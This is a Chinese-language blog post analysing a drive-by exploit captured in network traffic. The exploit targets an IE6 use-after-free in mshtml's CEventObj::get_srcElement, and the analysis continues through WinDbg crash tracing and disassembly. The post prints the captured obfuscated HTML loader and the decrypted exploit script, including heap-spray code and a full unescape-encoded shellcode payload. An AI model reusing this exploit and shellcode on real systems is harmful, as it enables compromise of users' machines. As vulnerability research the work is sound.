1.1 概览样本数据流
![1567989585537[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090140739-1097392819.png "1567989585537[3]")
分析:
可以观察到样本已经提取得很精炼并没有多少个包,协议只有http、tcp 所以我们不用协议分层、会话、端点等分析,直接流追踪就行
1.2 tcp流追踪
![1567989755433[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090141807-1705246378.png "1567989755433[3]")
![1567989802698[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090142502-646274716.png "1567989802698[3]")
![1567989838424[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090143234-1836000758.png "1567989838424[3]")
分析:
从上面得图中可以发现以下流程:
![1567990656779[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090143931-396167126.png "1567990656779[3]")
分析:
服务端第二次返回了一个html文档,里面包含了这样得内容:
<html>
<head>
<script>
var IwpVuiFqihVySoJStwXmT = '04271477133b000b1a0c240339133c120e2805160e1503684d705005291a08091b3e6e713e1122520b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39394a716a2615275207142524357d43772c2702705a2f466a657c6e4a256a7450614176566c65257e4165310515150a0f2b35302a103d0e03041e0234362f3a3c34073e1b0d0d02131e3f1635200e21101c38093913112e322223211f3239302133381b330a0c2c1175576c2e2713251f2308236b2f270f2d3e2d353c172b03393164031d192b1e363c012f072d311538230f2e113979490b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39393125176614310627466a656e0d3a3968730d261334463b1122303b07052d3d3705303e36340f05131d0b2934142b070d33657175043926244b261334461d362b31063d3e00263e1c110f11080f250e340020150110220c1e111c3d0e273f3a3a21050f2b2208341f04042c684d701c231177043e270b3562614b26133446220e083e1c0d0e1b3d1d31362b271221170036001a240230092e222638383d152b1a23162b0d3330230b14053e3e3c1a321537122d27043a30271d2439383b121f160a033e1c211e383f203e3e143136190210081f2c1e231603112d363975576c3f261523112716327e2a20042f3e211f3e5221212e233d131c0f1318223d2a24080212361718392626070a24072c27102533210823092a15390917190d3e3310250d0c04053d04173d1c0f212b180820333c382d3e3d2036000921320a1c36371e4e7e3e3a34186c271f1707352e1f260a1a2d281c3b3c1e113411272e3d2419043d080611023c280d1c3318332b3b1c3d061f0b050810103b173a160f32230a060d16260216001c1c05684d70070d223c330d113901070b001d02110b152f361f3818180a3f180725123a121534381f0c113b05152021162a3e211e26282f012408242e381f27020605220124293309293c3321011a033a040822143533003f08000e22392c35270835137f656b701f2a727c4175077f5565726920537b782e55254b7f52366039610b75286d05364b7255723078305e2e6f3d49624b76432223746108693f7b47694063136423756c4f392c7d49695733526f7c7d701f75287b167507725f632369205e29797f5525417152616039315c78786d05644a720372302a6d592a6f3d44364b774322767b6153693f7c4164136313637c2a314f3973704966573355602328701f782b7c1175077f506e7469205e7b7e7a55254623526460396c08787d6d0569107f5672302a6d597b6f3d1669462743227129665d693f2e13364763136e762a364f397e29433657335460717f701f75727c16750722506e726920537b2c7d55254b7752646039615b78726d0536477f5672302a365e746f3d4436147f4322777b315c693f7c116245631331217e624f392c7d4963573300337174701f75727116750772076e7569205e742c7d5525467f00336039615375796d05644a74517230756d53756f3d43364b2443227c7d6c59693f2c46644a631331217f334f397e7a4469573354602328701f752c714075072002647269205e7d797f55254b7f5f6460396c5d78796d05364775517230756d5e7d6f3d493240714322767b6c59693f7141644063136e7475634f397e7044675733006f2374701f2a2e7c48750772556e776920592a73795525462452646039615a787d6d056942200572307566592a6f3d496840714322777b610c693f7c4963456313637575674f397e794236573352357c7d701f2a727b16750772506e7c69205e7b7e7155254b705f6660396c5378736d056442725772307567592a6f3d42674b754322717f3352693f7c41694a6313317d756c4f397370496957335260712d701f78737c407507725e6e7769205e297e7e55254b77003460393352787b6d05644a7f507230756d5e296f3d426714224322712a6c58693f71466941631363762a6d4f39732e16655733006f7c7f701f2a2e2c4675072250637c69205e2d7e7e5525467f5f666039330e75726d0564452250723075375e7f6f3d16684b754322712e3353693f7c15644b6313632478634f397e7b446857330062717c701f787971487507750063276920537c7e7e55254624556060396158787b6d0563457f5f7230756c5e2a6f3d44314b714322232f6c5a693f7c1163146313637c75374f39797f496357335231767b701f782b711275077400637c69205e7c7e7b55254b2052656039610b2a726d056245725672302a3153756f3d166514224322767b615d693f7c4069406313647278624f39737b146657335f6f717a701f757c714975077500652369205e7b2c70552514255f6660396c5d75286d053647205e723028635e7b6f3d4463147f4322717f615d693f7c11634563133126786d4f397378423657335f352328701f78737c4275077451317c6920587b73795525467e5f316039615975726d0564417f5672307564537f6f3d49694171432223796c58693f7c49644063136e7378374f397379496357335f65772a701f75787c1275077551637d6920582a732a5525417154316039615b78286d056945725772302a360c756f3d4469147f4322217a335f693f714136116313637378664f397e7916345733006f7c7f701f7f7d7a47750772046e766920582a787f55254b765f3160396152787d6d05644b200272307562582a6f3d163446774322717b6c08693f7b4764406313637d2a6d4f397379446657335264217a701f75287a477507725731216920537f7e705525407152656039665d757c6d05364a205f72302a315e756f3d43364b7643227c7a6c5a693f71406944631331702a314f39782e496957335f6f2328701f2a2e2e147507725565236920537a2e7e55254b7552656039330978786d0564137f5e723078305e7e6f3d496246754322717b675d693f71436910631363722a314f397e79496357335236762a701f7f2c714175077f546e276920537d7e715525147f006f6039335f75286d05644a725f72307865532e6f3d49674b704322712e610c693f7147694563133170786d4f39737844615733526e7174701f757b7c4175077451637669205e7a2c7d552541715f6e6039335f78736d0569407f5472302a60537e6f3d44634b7443227c7c6153693f2e49644b6313637575674f397e784960573355312375701f782b2e1475077400637c69205e7e7e7b552546705f6060396c5c757d6d0569457251723078665e296f3d4962147e4322717b615b693f7b47364a63136e277e334f397e7e1466573355607c7d701f2a2e71477507725e6e2369200e7a737b552540205f616039665d757d6d056443200572302a6d537e6f3d16334b754322217a6c53693f7c4769406313637475374f39792e4432573352317c7c701f75282e147507725f642369200c282c7d55251473526660396159752c6d05364b205372307565532e6f3d44324b7f43227c7c6c59693f2e1469436313657278634f39737049365733526e717e701f757d2e487507725e6e7269205e7b792e55254b755560603933097f2c6d05364b200272307830582a6f3d4462147e43222375670c693f7146694263136e7575634f397e71146657335f317c2a701f757a714875077f56637569200c75737955254624546060396c0c757b6d056413725e7230786d0c746f3d4336467543227c75665d693f7c41344463136e7c78344f397e7a4432573352357c7a701f757b7c467507725e317d69200c74737b55254671543160396c527e2c6d05644b7f57723078675e7d6f3d493246744322717a6c08693f7c4263146313632378304f39737f496257335f657c7a701f2e2c714875072751672769205e2d2c2a5525167e0235603936537e736d056746225f72302a6158786f3d443210774322767d600b693f794267136313322474664f397a7b16335733076e727d701f2e2c79497507715767716920087e727155254a73006e603931082f2f6d0567137e0572307d36582a6f3d1663172343227728360b693f7e4763116313662675304f392f7b166057330734237e701f2d7b7f1275077451327369205c297a7155254a20566f603961522d7d6d0561427451723079605a7a6f3d14621724432277756553693f7846364463136675296c4f397f2a4369573353622074701f757e7a4475077603357d69205a7b787a55254127543460396c5e7b7c6d053511720272302d610c2f6f3d486941734322707d3659693f714068146313347c7d664f392e2a4864573350667d2e701f2a282b427507275036246920097b7b7955251175036260393759297b6d056047205172307f3759746f3d466911704322757e6c5c693f7e4735446313637629624f39737f1361573304317c7e701f7e7f7b4175077104367169200c7d7e2a55254b2354666039625829286d0567137f57723079635a286f3d406846714322747f655b693f7d466011631336777c634f392f2b136157335431767e701f7e782d4475077004357669200f7a297a5525407e5f316039370f7a286d056917725372302d6553786f3d473640744322242d665a693f714433436313317478674f397f714834573356367274701f2a7c7c157507715f672769205f757d2b552543730760603964582f296d053543705772307c6c597f6f3d473416734322277e360b693f7d476247631332737c6c4f39292e476557335e602774701f7c2c791575077354637169205f2a28785525422203366039665a7b7a6d0536177207723079345b746f3d42614673432273796652693f7c11681463136e2328674f39287d4568573305637d2d701f792e7d4275077652347d69205d2a7d7b5525177452626039630c7d736d053211765572307d6308796f3d436642234322217a675d693f7b426847631362267a624f39297a426957335f62777a701f287a7c447507735333236920522d7b7b5525447f51616039345b742f6d053614715072307a6559786f3d4967407643227079665c693f7b486044631335752f6c4f392c79413357335135702a701f2a2f7c12750771046f2369200b74722a5525452405626039650929796d0562142402723079665b7a6f3d4533447e4322267a6d08693f7b456940631363757b334f39282a163157330761247a701f787e2945750775506f216920537e732955251025036f60396c5a292b6d056716775e706c77230b3e6a3d1136050e2131121938122703291d704f66131c0127232b0819053d13020b1600280e3f1006181c22123d0e1334312102332d181b360939130131020d3a18383e22123703321c350d230f011b26011819263f27180a272307183a07001c0a340024101b2f2e192e26033437311c24306475486968685b70503344776e6c775a6e6a6350721164467c656e65486c6168523450664d77676920486c6168526050664d77672f774a676a6a4072526d4675216e7543772e27502b523307313204120c1b1f25083b3b270b776e71751f2d2c3f38171411333a3d271c0b216a3550271a2f0a326d6c200b2a3d00373625130b2f2e05340762262d1e37062e466b657c2d0e7c7a7840705b7d0038376c7d396c7768406b5215466b657d605a776a1b5b7b5b662c242228391b38021e1e3e252f201a063c311206222d2132162c2f031524310139380201273b0b131a3d063b222a111b2d704f661336233b1d2d2a1d1d1d28190f073a656775071b2d1f37380b3729013d0e051b3824093607333f1e3f09222428022b1a3e3e190d1003230d223c393c0709131c013320071c0f2f361912041b0237210d103a052577372e053e11320f382b6c02033f2d0d17043c0300360a023001093b293d293313271b09010c3d6429380a3e331c0e1021381a021809062306350a34331c29100c0f0b183b1d173c122714223a21180d03033a002e0e3c2a34163d1c30610b37353f0026033a16331c182528321c13312d073e2006223d1226113836333e230711030d100d3b1f03082e2523363c2d083e1d3f12032c3f14310d01282409243a3b2a2c032d102f38120e262e35085a6f5d3b1122303b07052d3d3705303e36340f05131d0b2934142b070d336571750e23293d1d351c3248343729341e290f3e153e0609043d202f21422f3a321e11282e213331033d3e0f041b26173e14020e200933290d1a033d35083216062b231e3e0b013b1a221a2e0d383d0f023a366373143f11330b322b387b0d293e0d1c351f23082307351c0e64683e18012b0025232a083b25361f07052833200a1316360327050211183a38290c160a0f1d24163e19143c0a1536111029101e24090f1402062f2f0e67657b0322242d0218260b2a77786c7748773d211e341d31482420381c04382f3a06311e6e08363c261b1f1f242b1e2835280e0d0106272f142b3c23141936097b6579654377372e053e11320f382b6c3b0b35200605031c25082f02223d3008003a3508133235132e3c3a42653138506d52643a22752f650c103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3148772c2702705a2f466a657c6e4a256a74501d17031e1e082e200c091d0a391c1c1420270c212c121e1e1f371500050a2e352e302838301802113b05053f1139330706123d0a39312e0f222962390f222d3c186b522f4d7c6c37180f0932013d3207202300070519041e0c38393d0b3e3403120b10180f263100321704122d153e14230f29202425142b2c0f30363c2924233d1c0b1b1b48332438344a716a384b2d04271477316c684a201e2615013909031a223b23322d3b0b2029230707130115140128643b0233372a033a2022215131';
var RXb = '';
for (i = 0;i<IwpVuiFqihVySoJStwXmT.length;i+=2) {
RXb += String.fromCharCode(parseInt(IwpVuiFqihVySoJStwXmT.substring(i, i+2), 16));
}
var vuWGWsvUonxrQzpqgBXPrZNSKRGee = location.search.substring(1);
var NqxAXnnXiILOBMwVnKoqnbp = '';
for (i=0;i<RXb.length;i++) {
NqxAXnnXiILOBMwVnKoqnbp += String.fromCharCode(RXb.charCodeAt(i) ^ vuWGWsvUonxrQzpqgBXPrZNSKRGee.charCodeAt(i%vuWGWsvUonxrQzpqgBXPrZNSKRGee.length));
}
window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span></body></html>
</body>
</html>分析:
此html文档包含了一个js 脚本 和一个<span>标签,在span标签里面有一个<iframe src = "/...gif"> ,并且在这个<iframe>加载的时候给了一个动作函数 "WisgEgTNEfaONekEqaMyAUALLMYW(event)" 将当前动作事件以参数的形式传递进去,目前这个函数可以猜测是上面的脚本来的。
但是上面的脚本里面没有这个函数,所系分析脚本:
脚本是根据当前请求链接上的第一个参数作为密钥,解密了这个数组内容,并且使用window["eval"].(Script)的方法执行了这个内容
那就能解释了,这个解密后是脚本,并且有WisgEgTNEfaONekEqaMyAUALLMYW(event)这个函数。
1.3 提取脚本并调试获取解密脚本
这里我用chrome浏览器调试,我在解密后执行前下一个断点,如下:
![1567991408146[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090144516-491829890.png "1567991408146[3]")
分析:
此时的 NqxAXnnXiILOBMwVnKoqnbp 即保存的是 解密后的脚本,我们通过chrome 的数据窗口保存数据到本地:
![1567991640451[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090145240-1296165464.png "1567991640451[3]")
1.4 查看并分析解密后脚本
var VwUaVFlsiaztYmICdYI = "COMMENT";对象名
var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();全局数组
for (i = 0; i < 1300; i++)
{
//初始化全局数组MeEx...1300个元素节点为 "COMMENT"
MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
//初始化每个 "COMMENT"对象的.data -- 数据为 "XPu"
MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
}
//event对象
var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;
//又是一个全局数组,观察gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX()
//发现使用来填充滑板指令+sellcode的。
var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();
//unescape() 该函数的工作原理是这样的:通过找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字),用 Unicode 字符 u00xx 和 uxxxx 替换这样的字符序列进行解码
var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;
function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX()
{
//unescape() 获取 uxxxx类似的字符序列 转义shellcode。。。
var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu( '%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
//滑板指令,溢出修改地址,触发堆喷条件0c0d0c0d
var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do {
uafwHGfWUmxkIam += uafwHGfWUmxkIam
//创建局部空间 0xd0000*unescape("%u0c0d%u0c0d")的滑板空间
}
while( uafwHGfWUmxkIam.length < 0xd0000 )//创建局部空间 0xd0000*unescape("%u0c0d%u0c0d")的滑板空间
for (S = 0; S < 150; S++)
//创建全局空间 实现堆喷 组合150个 滑板指令:shellcode;
JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
}
function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz)
{
//在栈空间溢出 并/&& 在堆空间中填充滑板指令和shellcode
gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
//document.CreateEventObject() 创建一个event对象
lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
//获取 <span>元素,,,理解为上一层的(其实是同一层,这里的整个脚本是windows["eval"](scriptcode) 执行的scriptcode脚本 )
document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
//相当于我们c++中的定时器每50ms*发作*一次,
window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
}
// 猜测这里就是漏洞点????
function nayjNuSncnxGnhZDJrEXatSDkpo()
{
p = "u0c0fu0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d";
for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++)
{
//把这个堆空间 全局 "COMMENT" 元素节点数组 的每个 元素的data 换成滑板指令 0c0f0c0d0c0d0c0d0c0d0c0d0c0d0c0d0c0d0c0d0c0d0c0d0c0d0c0d0cd0c0d0c0d0c0d0..
MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
}
//生成事件的windows对象,在这儿是<iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif"/>
var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
}
分析:
我们看到的确在这里面有 WisgEgTNEfaONekEqaMyAUALLMYW() 函数,概览了分析了一下整个脚本(详情请查看上面的注释)。总结如下:
1. gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX()
此函数填充了 0xd0000个栈溢出跳转地址和堆空间空间150个滑板指令+shellcode
lTneQKOeMgwvXaqCPyQAaDDYAkd
2. 创建了全局的变量事件触发event副本
把 <span>标签vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY
的内容置空
3. 设置一个定时器,发作间隔为50ms,发作响应函数为nayjNuSncnxGnhZDJrEXatSDkpo
这个函数是将全局对象的空间填充为"u0c0fu0c0du0c0du0c0du0c0du0c0d...“,并访问了这个已经置空的lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement,即<iframe>触发事件对象,猜想这里应该就是触发了崩溃,因为已经置空了还在去访问。
2.1 获取崩溃点
使用windbg 附加ie 6.0 的进程,然后访问本地搭建的服务器(这里使用phpsudy搭建,根目录下放我们前面提取出的html文档),链接使用 xxx.html?rFfWELUjLJHpP,xxx为你存储的html文档名
![1567993930123[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090146215-614114161.png "1567993930123[3]")
分析:
如前面分析脚本中的验证,根据栈回溯分析,是mshtml!CEventObj::get_srcElement导致的崩溃,即脚本中的 lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement。
2.2 分析上下文 查看奔溃点的来源
> u mshtml!CEventObj::get_srcElement
![1567994510506[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090147024-63600392.png "1567994510506[3]")
> u mshtml!CEventObj::GenericGetElement l0x100
![1567994959836[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090147716-74097675.png "1567994959836[3]")
> u mshtml!CElement::GetDocPtr
![1567995310464[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090148413-952814407.png "1567995310464[3]")
崩溃点环境:
![1567995406787[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090148902-316380004.png "1567995406787[3]")
分析:
-
我们可以看到ecx是0x 00000054 所以产生了异常。
-
我往上找(上面第二张贴图)发现 在mshtml!CEventObj::GenericGetElement 中 ecx 源于 ebx,ebx 来源于.......可以追溯到 当前的局部变量 [ebp-0x8] 中。
![1567996410352[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090149787-1286152745.png "1567996410352[3]")
-
简单的浏览观察到没有哪里有赋值[ebp-0x8],所以开始展开分析。
![1567996410352[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090149449-817131918.png "1567996410352[3]")
2.3 展开分析追溯崩溃源
展开 mshtml!CEventObj::GenericGetElement 函数 查看 局部变量 [ebp-8]
mshtml!CEventObj::GenericGetElement:
7e44c42c 8bff mov edi,edi
7e44c42e 55 push ebp
7e44c42f 8bec mov ebp,esp
7e44c431 83ec10 sub esp,10h
7e44c434 8365fc00 and dword ptr [ebp-4],0
7e44c438 56 push esi
7e44c439 8b7508 mov esi,dword ptr [ebp+8]
7e44c43c 85f6 test esi,esi
7e44c43e 894df4 mov dword ptr [ebp-0Ch],ecx
7e44c441 750c jne mshtml!CEventObj::GenericGetElement+0x23 (7e44c44f)
7e44c443 c745fc03400080 mov dword ptr [ebp-4],80004003h
7e44c44a e9e4000000 jmp mshtml!CEventObj::GenericGetElement+0x107 (7e44c533)
7e44c44f 8b4df4 mov ecx,dword ptr [ebp-0Ch]
7e44c452 832600 and dword ptr [esi],0
7e44c455 8d45f0 lea eax,[ebp-10h]
7e44c458 50 push eax
7e44c459 ff750c push dword ptr [ebp+0Ch]
7e44c45c e807f6ffff call mshtml!CEventObj::GetUnknownPtr (7e44ba68)
7e44c461 85c0 test eax,eax
7e44c463 0f84ca000000 je mshtml!CEventObj::GenericGetElement+0x107 (7e44c533)
7e44c469 8b45f0 mov eax,dword ptr [ebp-10h]
7e44c46c 8b4df4 mov ecx,dword ptr [ebp-0Ch]
7e44c46f 8906 mov dword ptr [esi],eax
7e44c471 8d45f8 lea eax,[ebp-8]
7e44c474 50 push eax
7e44c475 e8ce1de3ff call mshtml!CEventObj::GetParam (7e27e248)
7e44c47a 85c0 test eax,eax
7e44c47c 8945fc mov dword ptr [ebp-4],eax
7e44c47f 0f85ae000000 jne mshtml!CEventObj::GenericGetElement+0x107 (7e44c533)
7e44c485 8b450c mov eax,dword ptr [ebp+0Ch]
7e44c488 2de9030000 sub eax,offset <Unloaded_ud.drv>+0x3e8 (000003e9)
7e44c48d 57 push edi
7e44c48e 7422 je mshtml!CEventObj::GenericGetElement+0x86 (7e44c4b2)
7e44c490 83e808 sub eax,8
7e44c493 7412 je mshtml!CEventObj::GenericGetElement+0x7b (7e44c4a7)
7e44c495 48 dec eax
7e44c496 0f8596000000 jne mshtml!CEventObj::GenericGetElement+0x106 (7e44c532)
7e44c49c 8b45f8 mov eax,dword ptr [ebp-8]
7e44c49f 8b7008 mov esi,dword ptr [eax+8]
7e44c4a2 8b787c mov edi,dword ptr [eax+7Ch]
7e44c4a5 eb13 jmp mshtml!CEventObj::GenericGetElement+0x8e (7e44c4ba)
7e44c4a7 8b45f8 mov eax,dword ptr [ebp-8]
7e44c4aa 8b7004 mov esi,dword ptr [eax+4]
7e44c4ad 8b7878 mov edi,dword ptr [eax+78h]
7e44c4b0 eb08 jmp mshtml!CEventObj::GenericGetElement+0x8e (7e44c4ba)
7e44c4b2 8b45f8 mov eax,dword ptr [ebp-8]
7e44c4b5 8b30 mov esi,dword ptr [eax]
7e44c4b7 8b7874 mov edi,dword ptr [eax+74h]
7e44c4ba 85f6 test esi,esi
7e44c4bc 7474 je mshtml!CEventObj::GenericGetElement+0x106 (7e44c532)
7e44c4be 53 push ebx
7e44c4bf 8b1e mov ebx,dword ptr [esi]
7e44c4c1 8bcb mov ecx,ebx
7e44c4c3 e8bbc7e2ff call mshtml!CElement::GetDocPtr (7e278c83)
7e44c4c8 8b804c010000 mov eax,dword ptr <Unloaded_ud.drv>+0x14b (0000014c)[eax]
分析:
我们可以从上面找到如下语句:
![1567996547330[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090150084-1951740453.png "1567996547330[3]")
可以看出,调用了GetParam函数,ebp-8是存储的参数
分析 mshtml!CEventObj::GetParam函数:
0:000> u mshtml!CEventObj::GetParam
mshtml!CEventObj::GetParam:
7e27e248 8bff mov edi,edi
7e27e24a 55 push ebp
7e27e24b 8bec mov ebp,esp
